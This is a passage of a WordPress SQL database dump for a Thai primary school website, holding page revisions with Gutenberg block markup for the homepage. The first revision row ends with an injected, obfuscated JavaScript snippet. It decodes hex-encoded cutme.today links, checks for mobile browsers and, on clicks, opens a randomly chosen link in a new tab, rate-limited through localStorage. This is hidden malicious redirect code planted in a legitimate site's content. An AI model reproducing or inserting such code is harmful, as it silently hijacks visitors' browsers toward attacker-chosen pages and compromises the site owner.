_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 12:07:53','2024-07-27 05:07:53','',14,'http://pakhaeng.ssk.in.th/?p=131',0,'revision','',0),
(132,1,'2024-07-27 12:08:10','2024-07-27 05:08:10','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 